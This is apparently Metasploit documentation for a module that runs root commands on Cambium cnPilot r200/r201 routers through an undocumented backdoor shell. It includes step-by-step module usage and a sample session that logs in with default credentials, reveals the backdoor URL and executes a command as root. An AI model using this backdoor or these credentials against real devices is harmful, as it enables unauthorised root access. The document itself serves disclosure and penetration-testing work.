documentation/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.md
Cambium cnPilot r200/r201 device software versions 4.2.3-R4 and newer, contain an undocumented, backdoor 'root' shell. This shell is accessible via a specific url, to any authenticated user. The module uses this shell to execute arbitrary system commands as 'root'.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/cnpilot_r_cmd_exec```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```set CMD [command]```
5. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/http/cnpilot_r_cmd_exec
msf auxiliary(cnpilot_r_cmd_exec) > set RHOSTS 1.3.3.7
msf auxiliary(cnpilot_r_cmd_exec) > set RPORT 80
msf auxiliary(cnpilot_r_cmd_exec) > set CMD uname -a
msf auxiliary(cnpilot_r_cmd_exec) > run
[+] 1.3.3.7:80 - Cambium cnPilot confirmed...
[*] 1.3.3.7:80 - Attempting to login...
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "user":"user"
[*] 1.3.3.7:80 - Checking backdoor 'root' shell...
[+] 1.3.3.7:80 - You can access the 'root' shell at: http://1.3.3.7:80/adm/syscmd.asp
[+] 1.3.3.7:80 - Executing command - uname -a
[+]
Linux cnPilot-R201 2.6.36 #1 Thu Feb 9 03:02:39 CST 2017 mips unknown
[+] File saved in: /root/.msf4/loot/20000000000003_default_1.3.3.7_cmdexeclog_12345.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```